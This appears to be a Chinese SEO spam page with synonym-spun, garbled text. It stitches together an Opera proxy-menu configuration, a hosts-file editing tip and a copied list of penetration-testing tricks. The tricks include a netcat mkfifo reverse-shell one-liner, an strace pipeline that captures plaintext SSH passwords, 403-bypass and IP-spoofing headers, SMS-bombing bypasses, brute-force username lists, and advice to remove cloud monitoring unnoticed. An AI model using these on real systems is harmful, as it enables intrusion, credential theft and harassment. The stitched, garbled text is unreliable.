您的位置 首页 心得分享

dnf私服hosts使用Opera 主动代办署理解决方案和代办署理菜单

前几天把浏览器晋级了,嘛,总要与时俱进。

Opera build 9053 是我客岁用得最久的版本,不断以来也挺惬意。

正本筹算在 Barracuda 出来前用一小段时间 11 的,但要更新的时辰恰好 就出来了,因而就跳了。。。

之前发过的 Opera 代办署理菜单和按钮,良多人反应部份饬令在 11 下生效了。

趁此机会更新下,并综合了来自其他高手的改善。

本文只是给出计划和设置装备摆设,不供应任何相关东西和网址。

Opera 代办署理解决方案引见

此次改得对照多,我就罗嗦点。再全部引见一次首要代办署理计划。

结果预览

先放一张预览和示意图:

需求阐明

有三种形式:

禁用代办署理,Direct mode,也就是直连。 主动代办署理,Auto proxy mode 用的 PAC,只对吻合名单内的划定规矩利用代办署理。 全局代办署理,Global proxy mode,收集恳求都经过代办署理接见。这个形态又有多种 IP 和端口等。

注:这里的全局不是零碎全局,而是全部浏览器顺序,如斯称号是为了轻易表达。

普通环境下,我们的需求是:

平常用主动代办署理,碰到列表以外的网站,凭据是不是会再次接见选择到场代办署理列表 or 暂且利用全局代办署理。 在全局代办署理的时辰可以轻易的切换端口,而且对一些常去的国际站点停止疏忽。 当我们完整不需求代办署理或停止一些测试排查的时辰。

代办署理计划构成

这套代办署理计划包括以下部份:

dnf私服hosts使用

代办署理按钮 :能显示三种分歧的形式和10种罕见代办署理端口。点击在“禁用代办署理 / 启用上一次利用的代办署理体式格局”之间停止一键切换。

:能显示三种分歧的形式和10种罕见代办署理端口。点击在“禁用代办署理 / 启用上一次利用的代办署理体式格局”之间停止一键切换。 代办署理切换菜单 :这个菜单会轻易你在三种形态和多个代办署理端口之间停止疾速切换,还有答应代办署理东西、添加 PAC 划定规矩、破例列表,和二级菜单中的其他功用。

:这个菜单会轻易你在三种形态和多个代办署理端口之间停止疾速切换,还有答应代办署理东西、添加 PAC 划定规矩、破例列表,和二级菜单中的其他功用。 图标包 :对应的菜单条目和代办署理形态、端口了如指掌。

:对应的菜单条目和代办署理形态、端口了如指掌。 Pac 文件:用 PAC 来完成各类浏览器通用的主动代办署理,比起 的方式强太多了。

dnf私服hosts使用

Opera 代办署理菜单和按钮的改善

事实上我正本筹算修复 11 以上版本没法利用的成绩后,只是加上本人这段时间的做出的小调剂。

但发明悲戚的推销做出了几个重量级的改善,相当让人钦佩。概况见:另一个代办署理菜单和按钮

因而就把那些也综合出去了,那末目下当今这个比起之前的菜单和按钮首要改善有:

在饬令之间添加了延迟,目下当今能在 Opera 11 以上版本正常任务。

不经常使用的代办署理端口切换放在了二级菜单下,添加了一些代办署理设置的二级菜单。

目下当今的计划中只需求一个 PAC 文件便可,便于保护。并能主动批改 PAC 途径。

从头做了一套代办署理图标,提取自 Opera 11 的皮肤包和各类相关东西,巨细一致为 22×22。

新增“添加站点到主动代办署理划定规矩”(在 PAC 中疾速添加划定规矩)和“添加站点到破例列表”这两个弱小的饬令。

dnf私服hosts使用

精简部份代码,简化菜单条目。供应多种履行体式格局可供选择。

此中,“在“禁用代办署理 / 启用上一次利用的代办署理体式格局”之间停止一键切换”、“修复 PAC 文件途径”和前面阿谁“添加站点到破例列表”饬令来自采儿。

感激采儿~,我们就不必多说甚么了。

“添加站点到 PAC”,方式来自:在PAC中快捷添加以后网站的划定规矩

不外和原文供应的代码有不同之处:

生成划定规矩和到场划定规矩兼并为一个饬令,由于目下当今只需求一个 pac 文件嘛。 不需求在弹出窗口中点窜划定规矩(不直观),跳过了手动全选和复制的操作。 到场划定规矩并利用更改后源代码页不主动封闭,新增划定规矩位于 pac 顶部,轻易确认和点窜。 无需点窜 文件(用了取巧的方式 XD)。

设置装备摆设 Opera 主动代办署理切换计划

添加代办署理按钮

在一样的思绪下,有四种分歧的完成体式格局。请凭据你的环境和需求选择其一。

添加代办署理菜单

编纂 菜单配置文件,在最初添加以下代码。

主菜单,点击睁开

[Quick Proxy Menu]

;Quick Proxy Menu by & 悲戚的推销

Item, 启用主动代办署理=Disable proxy servers,,,,proxy_pac & Open url in new page,”opera:config” & Delay,10 & Go to page,”javascript:var allExc=(‘Proxy’,’No Proxy Servers’),usePAC=”,useALL=”;if((usePAC)==-1 && (useALL)==-1){allExc+=’,’+usePAC}else if((useALL)!=-1){allExc=(useALL,usePAC)}(‘Proxy’,’No Proxy Servers’,allExc);(‘Proxy’,’Use Automatic Proxy Configuration’,1);(‘Proxy’,’Automatic Proxy Configuration URL’,(‘User Prefs’,’Opera Directory’)+’tools\\’);()”

Item,启用全局代办署理=Disable proxy servers,,,,proxy_all & Open url in new page,”opera:config” & Delay,10 & Enable proxy servers & Go to page,”javascript:var allExc=(‘Proxy’,’No Proxy Servers’),usePAC=”,useALL=”;if((usePAC)==-1 && (useALL)==-1){allExc+=’,’+useALL}else if((usePAC)!=-1){allExc=(usePAC,useALL)}(‘Proxy’,’No Proxy Servers’,allExc);(‘Proxy’,’Use Automatic Proxy Configuration’,0);()”

——0

Item,添加为主动代办署理划定规矩=External action,,,,add-pac| Stop & Focus address field & Copy & Delay,10 & Go to page,”javascript:var u=String(‘%c’),n=(‘://’),m=(‘/’,n+3),u=(n+3,m);prompt(‘New PAC Rule for this Current Site’,’%%22’+u+’%%22,

‘);void(0)” & Delay,10 & Copy & Cancel & Delay,10 & Go to Page,”PAC 文件的绝对路径” & Delay,10 & View document source & Switch to previous page & Close page,1 & Delay,10 & Next line & Next line & Next line & Paste & Delay,1 & Reload

Item, 添加域名到破例列表=External action,,,,Add widget|Duplicate page & Delay,10 & Go to page,”javascript’opera:config#’+” & Delay,1 & Delay,350 & Go to page,”javascript:(function(){var hn=String().slice(13),allExc=(‘Proxy’,’No Proxy Servers’),allExc_A=(‘,’),tempA=(‘,’),allExc_R=new RegExp((‘^’+allExc+’$’).replace(/\./g,’\\.’).replace(/\*/g,’\.*’).replace(/,/g,’$|^’)),newExc;for(i=>=0;i–){var temp1=new RegExp((‘^’+tempA[i]+’$’).replace(/\./g,’\\.’).replace(/\*/g,’\.*’));if(!(hn)){(i,1)}}newExc=(>0)?prompt(‘Tips: 可利用通配符,例如 *.。

此站点已在破例名单中,但可点窜域名再添加。

以下是和此域名婚配的已有划定规矩:

‘+(‘

‘),hn):prompt(‘将此站点添加到破例名单中。接见破例名单中的站点时将疏忽代理服务器设置。’+’

‘+’可利用通配符,例如 *. 。’,hn);if(newExc!=null && /\S/.test(newExc)==true){if(!(newExc)){var newExc_R=new RegExp((‘^’+newExc+’$’).replace(/\./g,’\\.’).replace(/\*/g,’\.*’)),old=’

‘,allExc_A=(‘,’),tempA=allExc_A;for(j=>=0;j–){if((tempA[j])){old+=tempA[j]+’

‘;(j,1)}} if(old==’

‘){allExc+=’,’+newExc}else{var left=confirm(‘以下旧划定规矩已被刚输出的新划定规矩包括,是不是依然保存?

‘+old);allExc=(left)?allExc+’,’+newExc(‘,’)+’,’+newExc}(‘Proxy’,’No Proxy Servers’,allExc);alert(newExc+’ 添加完成’)}else{var not2add=(newExc==hn)?’俺不是早说加过了嘛╮(╯﹏╰)╭’:’哦…本来介个也已加过了 ╮(╯▽╰)╭’;alert(not2add)}}else{alert(‘添加已作废’)}()})()”,1

dnf私服hosts使用

Submenu, “更多设置”, More Proxy Setting=”Show popup menu,,,, “Menu Tools””

——1

Item,Privoxy / Polipo – 8118=Disable proxy servers,,,,p & Open url in new page,”opera:config” & Delay,10 & Enable proxy servers & Go to page,”javascript:var allExc=(‘Proxy’,’No Proxy Servers’),usePAC=”,useALL=”,proxy_all=”;if((usePAC)==-1 && (useALL)==-1){allExc+=’,’+useALL}else if((usePAC)!=-1){allExc=(usePAC,useALL)}(‘Proxy’,’No Proxy Servers’,allExc);(‘Proxy’,’Use Automatic Proxy Configuration’,0);(‘Proxy’,’FTP server’,proxy_all);(‘Proxy’,’Gopher server’,proxy_all);(‘Proxy’,’HTTP server’,proxy_all);(‘Proxy’,’HTTPS server’,proxy_all);(‘Proxy’,’WAIS server’,proxy_all);()”

Item,GAppProxy – 8000=Disable proxy servers,,,,gapp & Open url in new page,”opera:config” & Delay,10 & Enable proxy servers & Go to page,”javascript:var allExc=(‘Proxy’,’No Proxy Servers’),usePAC=”,useALL=”,proxy_all=”;if((usePAC)==-1 && (useALL)==-1){allExc+=’,’+useALL}else if((usePAC)!=-1){allExc=(usePAC,useALL)}(‘Proxy’,’No Proxy Servers’,allExc);(‘Proxy’,’Use Automatic Proxy Configuration’,0);(‘Proxy’,’FTP server’,proxy_all);(‘Proxy’,’Gopher server’,proxy_all);(‘Proxy’,’HTTP server’,proxy_all);(‘Proxy’,’HTTPS server’,proxy_all);(‘Proxy’,’WAIS server’,proxy_all);()”

Item,FG / FreeU – 8580=Disable proxy servers,,,,fg & Open url in new page,”opera:config” & Delay,10 & Enable proxy servers & Go to page,”javascript:var allExc=(‘Proxy’,’No Proxy Servers’),usePAC=”,useALL=”,proxy_all=”;if((usePAC)==-1 && (useALL)==-1){allExc+=’,’+useALL}else if((usePAC)!=-1){allExc=(usePAC,useALL)}(‘Proxy’,’No Proxy Servers’,allExc);(‘Proxy’,’Use Automatic Proxy Configuration’,0);(‘Proxy’,’FTP server’,proxy_all);(‘Proxy’,’Gopher server’,proxy_all);(‘Proxy’,’HTTP server’,proxy_all);(‘Proxy’,’HTTPS server’,proxy_all);(‘Proxy’,’WAIS server’,proxy_all);()”

Submenu, “其他代办署理端口”, More Proxy Port=”Show popup menu,,,, “Transfer Loading””

——2

Item, “理睬呼唤 Privoxy & SSH”=”Execute program,”profile\tools\ssh\” ,,,”p””

Item, “理睬呼唤 GAppProxy”=”Execute program,”profile\tools\Gapp\”,,,”gapp””

你需求点窜两处内部代办署理东西的途径(蓝色标注),非必须,只是影响到运转代办署理东西。绝对路径和相对路径均可, 这里用的是相对路径。还有一处 PAC 文件途径(白色),这是为了速度,并且添加和编纂划定规矩才会用到,所以就直接用绝对路径。

二级菜单 1:更多设置

dnf私服hosts使用

[More Proxy Setting]

Item, 翻开代办署理设置=Show preferences,22,,,Menu tools & Delay,1 & Show proxy servers

dnf私服hosts使用

Item,手动编纂 PAC=External action,,,,Mail Draft|Go to page,”PAC 文件的绝对路径” & Delay,1 & View document source & Switch to previous page & Close page,1

——0

Item, “对指定站点疏忽代办署理设置”=Set preference, “Proxy|No Proxy Servers Check=1”,, | Set preference, “Proxy|No Proxy Servers Check=0”

Item, “为代办署理启用 HTTP “=Set preference, “Proxy|Enable HTTP for proxy=1”,, | Set preference, “Proxy|Enable HTTP for proxy=0”

Item, “当地服务器不启用代办署理”=Set preference, “Proxy|Use Proxy On Local Names Check=0”,, | Set preference, “Proxy|Use Proxy On Local Names Check=1”

——1

Item, 测试网址是不是撞墙=Go to page, “”,,,”Menu Contacts”

Item, “检查以后 IP”=”Go to page, “”,,,”Contact0″”

需求点窜一处 PAC 文件途径(白色标注),影响“手动编纂 PAC”功用。

二级菜单 2:更多端口

[More Proxy Port]

Item,Wujie – 9666=Disable proxy servers,,,,wj & Open url in new page,”opera:config” & Delay,10 & Enable proxy servers & Go to page,”javascript:var allExc=(‘Proxy’,’No Proxy Servers’),usePAC=”,useALL=”,proxy_all=”;if((usePAC)==-1 && (useALL)==-1){allExc+=’,’+useALL}else if((usePAC)!=-1){allExc=(usePAC,useALL)}(‘Proxy’,’No Proxy Servers’,allExc);(‘Proxy’,’Use Automatic Proxy Configuration’,0);(‘Proxy’,’FTP server’,proxy_all);(‘Proxy’,’Gopher server’,proxy_all);(‘Proxy’,’HTTP server’,proxy_all);(‘Proxy’,’HTTPS server’,proxy_all);(‘Proxy’,’WAIS server’,proxy_all);()”

Item,Puff – 1984=Disable proxy servers,,,,puff & Open url in new page,”opera:config” & Delay,10 & Enable proxy servers & Go to page,”javascript:var allExc=(‘Proxy’,’No Proxy Servers’),usePAC=”,useALL=”,proxy_all=”;if(a

相关文章:Opera 按钮:在浏览器中编纂 Host 文件

写个按钮在 Opera 中翻开 host 文件并进入编纂形态。

是如许的,比来博客老是在搬迁,有四五次了。。。

搬迁以后我们要进入后台重建 sitemap、留存更改固定链接、清空插件缓存甚么的。平常不等域名解析好就下手,靠点窜 host 来接见新 ip。

因而老是频仍的再编纂 host 文件,到后来都懒的去开启文本编辑器,因而有了这个小技能。

这对常常点窜 Host 接见不存在的网站,或喜好经过 host 屏障告白的同窗,挺轻易的。

按钮:Edit Host

编纂完以后点击利用更改(Ctrl + R)便可失效。

Host 文件的途径和你的操作系统类型和装置地位有关。可以自行点窜代码中的 C:/WINDOWS/system32/drivers/etc/hosts

利用的方式和阿谁编纂 pac 文件是一样的,来自Opera 代办署理菜单。固然,你也可以把它改成菜单条目或快捷键。

dnf私服hosts使用

不久前 vps 最先各类不不乱,搬到某主机后又发明同 IP 有 H 站- -,然后又到其他的 vps。。。orz

Vps 都是 om 在折腾,辛劳了。

» 转载请以超链接方式注明起原: Blog » 《Opera 按钮:在浏览器中编纂 Host 文件》

» 本文链接地址:

相关文章:ffffffff0x/Pentest101: 每周(或许不)分享一些关于渗入测试的知识点

Pentest101

dnf私服hosts使用

每周(或许不)分享一些关于渗入测试的知识点

不管红队照旧蓝队,干活之前先让客户留存好日记和备份.(在烦琐我也要说,血的经验)

纲领

dnf私服hosts使用

红队

若何封闭 http://burp 避免蜜罐探测

Proxy – Options – Miscellaneous – Disable web interface at http://burp

dnf私服hosts使用

检测暗链的小技能,利用爬虫的 user-agent 遍历接见方针,对照 title 和内容

dnf私服hosts使用

DNS搜集的优先级 主动+爬取+过滤 > 自动扫描+爆破

可以利用这类思绪 rapid7公共数据集+js爬取+Github等第三方爬取+subfinder+OneForAll+ksubdomain过滤

对未知的webshell,可以测验考试爆破途径、暗码

也加一些参数,测验考试报错,看会不会有暗码

nc 用的不爽可以测验考试换个 reverse-shell 东西,推荐个 ,go写的,可以自动检测OS并履行准确的饬令,将其晋级为一个完好的交互式反向shell。

从反编译的 apk 文件中提取相关域名链接/IP

grep -E ” ([0-9]{1,3}[\.]){3}[0-9]{1,3} ” -r xxx –color=auto grep -E ” https?://[a-zA-Z0-9\.\/_&[email protected]$%?~#-]* ” -r xxx –color=auto

dnf私服hosts使用

经过正则从 apk 中提取一些敏感信息

apktool d grep -EHirn ” accesskey|admin|aes|api_key|apikey|checkClientTrusted|crypt|http:|https:|password|pinning|secret|SHA256|SharedPreferences|superuser|token|X509TrustManager|insert into ” APKfolder/

若是登录零碎设置了 IP 地址白名单,我们可以经过点窜 http 头字段捏造 IP 地址

http 头字段字典 :

dnf私服hosts使用

或直接点窜 host 头

dnf私服hosts使用

curl -v -H “Host: localhost” https://target/ wget -d –header=”Host: localhost” https://target/

有时候文件太大,想先确认一下文件布局和部份内容,这时候可以利用 remotezip,直接列出近程 zip 文件的内容,而无需完整下载,乃至可以近程解压,仅下载部份内容

pip3 install remotezip remotezip -l ” http://site/ ” # 列出近程zip文件的内容 remotezip ” http://site/ ” ” ” # 从近程zip⽂

URL跳转缝隙字典: ¶m/

burp 在疏忽方针的时辰是设置装备摆设 Intercept Client Requests , 可是这个选项不撑持批量导入, 只能一条一套的添加, 特别很是反人类, 所以 windows 下可以经过 Proxifier 设置装备摆设 Rules 做到疏忽指定的 host

附赠一个 Target hosts 列表

npm 和 github 减速可以利用 jsdelivr 的 cdn 停止减速,但 jsdelivr 不撑持 release 的宣布文件下载,可以采取 cf worker 布置的代理服务停止减速

dnf私服hosts使用

在 linux 中不晓得以后用户可用甚么饬令,可以利用上面的饬令,这条饬令可以列出一切可用的饬令(有点拗口)

compgen -c

火绒阻挡扫描,若何封闭阻挡?

火绒>收集防护>根蒂根基防护中封闭

druid 未受权接见罕见途径

/druid/

/system/druid/

/webpage/system/druid/

爆破方针用户名时应思索以下能够:

撞库

罕见手机号

罕见登录账号(admin、manager、test、deme)

数字组合(0-9、00-99、000-999、0000-9999、00000-99999)

拼音(zhangsan、、zhangs)

中文(张三、李四、张san)

英文名(Tom、Jeo、Cherry)

单元名(zssx123、[email protected])

地名(beijing123、[email protected])

dnf私服hosts使用

组合(地名+单元名)

域名(百度@123、[email protected])

诞辰组合

收拾整顿字典时,推荐用linux下的东西疾速兼并和去重

cat > sort | uniq >

dnf私服hosts使用

信息搜集小技能,仔细观察方针页面的js途径,多找几个js目次,专门用js字典停止爆破,获得的js剧本列表,再挪用东西去婚配途径和凭证。

有时一些上传点没有过滤,但你接见文件是经过函数调用获得文件,这个时辰可以先测下随便文件读,然后测验考试get改成post在测试随便文件读,若是存在,测验考试经过随便文件读找途径

打某一个行业想要有功效,最好要深切认识这个行业,我举个例子,比方搞传奇/dnf这类私服的,他们讲管理员都叫gm,不像搞IT的叫admin,那你爆一些私服游戏的网页后台、经管账号就需求搞一些行业黑话生成一下,比方/gm/或/chongzhi/,不服水土 ???? ,还有菠菜行业,注册用户需求6位约请码,良多都是888888、666666这类吉祥数字,逆向一下思绪,猜一猜方针受众喜好甚么。

我们在后渗入进程中常常要传 payload 到方针,暂且起的文件服务器都是 python 一条饬令的事

Python python -m SimpleHTTPServer 8000 # 在当前目录起个 8000 端口的 HTTP 效劳

Python python -m 8000 –bind

推荐一个可以加暗码的,一条饬令python服务器模块 pip3 install updog updog –port 8888 –password test1234

一般来说,某些场景多个效劳是协同的关系,比方就这个 LiveCMS 效劳必然和上面的监控装备有毗邻,否则日记不会这么大,可以搞一搞上级监控,也可以专门搞一搞这个 LiveCMS 和 LiveSMS、LiveGBS 尝尝 LiveCMS 端口利用

TCP 端口 : 5060(SIP), 10000(HTTP), 26379(Redis)

UDP 端口 : 5060(SIP)

LiveSMS : SIP 流媒体效劳, 凭据需求可布置多套

TCP 端口 : 5070(SIP), 10001(HTTP), 11935(RTMP Live), 30000-40000(RTP over TCP)

UDP 端口 : 5070(SIP), 50000-60000(RTP/RTCP over UDP)

有时候我们拿了一台 docker 机械,发明没有 ifconfig 饬令也没有 ip 饬令,不清晰怎样看 IP,这时候可以经过检查 proc 文件的体式格局来检查

cat /proc/net/fib_trie cat /etc/sysconfig/network

渗入时碰到某些上传点未作过滤,但负载平衡做了过滤后缀名的环境,可以上传 webshell 定名为 ,然后接见 , 测验考试 bypass 反代的战略

当渗入时碰到了 403 或 302、401 的回绝接见,不要怕,多 FUZZ 几回

从 HTTP Header 层面 bypass GET /admin HTTP/ Host: # ===> 403 GET /anything HTTP/ Host: X-Original-URL: /admin # ===> 200 GET /anything HTTP/ Host: Referer: # ===> 200 GET HTTP/ Host: # ===> SSRF

从 URL 参数层面 bypass /admin/panel # ===> 403 /admin/monitor # ===> 200 /admin/monitor/ ; panel # ===> 302 # ===> 403 # ===> 200 # ===> 200 . # ===> 200 # ===> 200 # ===> 200 .. # ===> 200 # ===> 200 # ===> 200(ruby) # ===> 200 # ===> 200 # ===> 200 # ===> 302 .. ; / # ===> 200

从和谈层面 bypass # ===> 403 # ===> 200

当我们拿下 windows 机械时可以经过抓内存中的暗码停止横向,但 linux 却不能够抓到内存中的暗码,可是 Debian 系列下的 linux 零碎可以经过监听 sshd 历程的数据抓掏出明文暗码,比方你拿下了一台管理员机械,下面由 xshell,你可以手动开一个监听,在开一个登录,监听的窗口上就抓出暗码了

strace -xx -fp ` cat /var/run/ ` 2>&1 | grep –line-buffered -P ‘ write\(\d, “\\x00 ‘ | perl -lne ‘ $|++; @F=/”\s*([^”]+)\s*”/g;for (@F){tr/\\x//d}; print for @F ‘ | grep –line-buffered -oP ‘ .{8}\K([2-7][0-9a-f])*$ ‘ | grep –line-buffered -v ‘ ^64$ ‘ | perl -pe ‘ s/([0-9a-f]{2})/chr hex $1/gie ‘

dnf私服hosts使用

渗入时尽可能不要露出本人的 IP 地址,挂代办署理是必需的

linux 下要检查本人终端是不是走代办署理可以 curl 看下前往的 IP 地址

windows 就直接接见 便可

dnf私服hosts使用

linux 下代办署理不必多说, proxychains-ng,windows 下推荐用 Proxifier

MSF 和 CS 中 Stage 与 Stageless 的区分

Stage : 先传一个 shellcode,然后回连端口,加载歹意 metsrv,然后再恳求 stdapi 于 priv,停止上线

Stageless : 将 shellcode、metsrv、stdapi、priv 打包,一次性传完

若是想让 msf 直接回弹到 NC,那末必需要用 stageless

dnf私服hosts使用

判定方针主机是否是虚拟机、容器

windows cmd : systeminfo Powershell : get-wmiobject win32_computersystem | fl model

linux lshw -class system | grep -i VM & grep -i virtual dmesg | grep -i VM & grep -i virtual dmidecode -s system-product-name ls /tmp systemd-detect-virt virt-what ls -alh /.dockerenv cat /proc/1/cgroup

msf 框架其实有很多 UI 界面的东西, 可以匡助不习气命令行的渗入测试人员停止渗入,我举几个例子

在停止云主机后渗入时,若是触发敏感操作,会有短信提示到管理员手机上,这个时辰可以酌情思索卸载云主机的监控 (有时你用云主机装 SSR 会没法毗邻也是这个缘由)

rlwrap 东西,可以完满处理各类 shell 中没法上下左右的成绩

例如 ,回弹了 shell,手贱按了上,这类环境(我想你必然碰到过 ???? ???? ???? ???? )

装置: apt install rlwrap

利用: rlwrap [Command]

cAdvisor 是 Google 出品的用于监控 Docker 容器的效劳,渗入时碰到这个效劳基本上是存在容器情况

dnf私服hosts使用

新版 kali 2020 版后利用 root 账号默许不给暗码,若是你想,可以直接停止点窜 : sudo passwd root

dnf私服hosts使用

nc 具有多个版本, 比方: traditional、openbsd、ncat

traditional 最老的版本,撑持最根基的功用

openbsd 平安版本,回弹要用一大段饬令 rm /tmp/f ; mkfifo /tmp/f ; cat /tmp/f | /bin/sh -i 2>&1 | nc 4242 > /tmp/f

ncat 新版本, 重构了旧版的代码并撑持了很多新功用, debian 系列发行版下经过以下饬令停止装置设置装备摆设 apt install -y ncat update-alternatives –set nc /usr/bin/ncat

顺序溢出,int 最大值为 2147483647,可测验考试利用该值停止整数溢出,窥察景象。

图片验证码可设置为空,如:code=undefined

也可以利用字典停止 fuzz

随便文件下载:/porc/self/cmdline — 以后历程的 cmdline 参数,/var/lib/mlocate/ — 全文件途径。

138888888889 12 位颠末短信网关取前 11 位,致使短信轰炸

短信轰炸绕过:手机号前加 + 86 有能够会绕过,手机号输出邮箱,邮箱处输出手机号

手机号码前后加空格,86,086,0086,+86,0,00,/r,/n, 和特殊符号等

手机号前加若干 + 会形成短信轰炸

dnf私服hosts使用

获得短信验证码时,用逗号离隔两个手机号,有能够两个手机号能获得到同一个验证码

dnf私服hosts使用

若是碰见后台页面一闪而过,接着让你登录,普通利用了权限认证体式格局: 三、302 跳转:阻挡并 drop 跳转的数据包,使其逗留在以后页面。 这个操作我每次试都是不胜利的,可是可以点窜前往的 302 为 200,然后删除掉 Location 字段。

蓝队

CobaltStrike 的 Fofa 语法

cert=”73:6B:5E:DB:CF:C9:19:1D:5B:D0:1F:8C:E3:AB:56:38:18:9F:02:4F”

红队经常使用的扫描器特点

“”、”” 和 “ReflectiveLoader” 默许是 CS Beacon 的硬编码特点。当寻觅内存中的后门时,可以行使这一点

Linux

用于文本处理的几个东西

tr : 多功能处置惩罚

: 主动去重

jq : json 格式化

expand/unexpand : 空格和 TAB 转换

命令行下截图的一种不错的体式格局

asciinema

神器级东西,Linux 下的 everything

推荐一个 linux 小东西 trash-cli 用于挪动文件到回收站,同时会纪录文件的原地址、删除日期和权限。trash-cli 和 KDE、GNOME、XFCE 利用同一个回收站,你可以在命令行或剧本运转 trash-cli。必然水平上可以替代 rm

dnf私服hosts使用

一个探针东西,可用于及时监测服务器运行状况

linux 利用进程中经常出现装置软件包失败的成绩,良多环境是碰到了锁,可以直接删除(运维兄弟们,出产情况下不要用啊 ???? ???? ???? )

debian系 报错:没法取得锁 /var/lib/apt/lists/lock – open (11: 资本临时不行用) rm -rf /var/cache/apt/archives/lock rm -rf /var/lib/dpkg/lock-frontend rm -rf /var/lib/dpkg/lock rm /var/lib/dpkg/lock rm /var/lib/apt/lists/lock

redhat系 报错:/var/run/ 已被锁定,PID 为 xxxx 的另一个顺序正在运转. rm -f /var/run/ 2> /dev/null

dnf私服hosts使用

特立独行的 Fedora 报错:Waiting for process with pid to finish. rm -f /var/cache/dnf/ 2> /dev/null

在 linux 中装置一些组件的依靠时会有比方 python-dev 和 python-devel 的区分,devel 或 dev 包首要是供开辟用,这代表分歧的刊行版本,redhat 系是 devel ,debian 系是 dev

点窜 Linux 的 DNS 不断是一个成绩,每次开机 dns 都会重置,debian 下可以利用 dns 管理工具与日俱增的处理

装置 apt-get install -y resolvconf

设置装备摆设 echo ” nameserver ” > /etc/resolvconf/

更新 resolvconf -u

若需求更改 DNS,请点窜 /etc/resolvconf/ 文件

若是在 red hat 系发行版中需求装开发工具,建议装置 Development Tools ,可以将常用软件,一次性装好

装置 yum groupinstall -y ” Development Tools “

分享几个linux功能调优的技能

sync # sync 饬令做同步,以确保文件系统的完整性,将一切未写的零碎缓冲区写到磁盘中,包括已点窜的 i-node、已延的块 I/O . echo 1 > /proc/sys/vm/drop_caches # 清算 pagecache(页面缓存) echo 2 > /proc/sys/vm/drop_caches # 清算 dentries(目次缓存)和inodes echo 3 > /proc/sys/vm/drop_caches # 清算 pagecache、dentries 和 inodes sync # 作废开启文件数限制 ulimit -n 65535 # 优化内存 echo 128 > /proc/sys/vm/nr_hugepages # 默许为0 sysctl -w

比来在 linux 搭建 vpn 效劳的时辰碰到时候和时区不同步的环境,分享下解决方案

检查以后时区

timedatectl

点窜以后时区:

timedatectl set-timezone Asia/Shanghai # 或 cp /usr/share/zoneinfo/Asia/Shanghai /etc/localtime

因为 python 官方住手了对 python2 的保护,当前大部分和 pip2 有关的操作都会报上面这个错,我预估一下,这个应当是当前我们碰到最罕见的成绩之一, 解决方案很复杂, 装置指定版本的 pip2 便可

curl –output python

Python 2 在 Ubuntu 20 上不存在,可是有时候照旧需求的。可以经过以下饬令装置

热门文章

发表评论

您的电子邮箱地址不会被公开。 必填项已用*标注